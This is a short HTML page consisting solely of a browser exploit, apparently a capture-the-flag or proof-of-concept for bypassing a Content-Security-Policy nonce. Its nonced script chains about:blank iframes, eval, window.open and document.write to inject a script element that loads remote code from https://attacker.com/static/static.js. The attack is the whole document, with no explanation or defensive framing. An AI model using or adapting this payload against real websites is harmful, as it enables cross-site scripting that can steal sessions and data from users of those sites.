<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGFYqtBGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGFYqtBGGGGG.onload=_=>GGGGGFYqtBGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGFYqtBGGG src=about:blank><\/iframe><script>GGGFYqtBGGG.onload=_=>GGGFYqtBGGG.contentWindow.eval(\x22var o=document.createElement(`script`);o.src=`https://attacker.com/static/static.js`;document.body.appendChild(o);void(0);\x22);GGGFYqtBGGG.contentWindow.location.reload();<\/script>');");GGGGGFYqtBGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>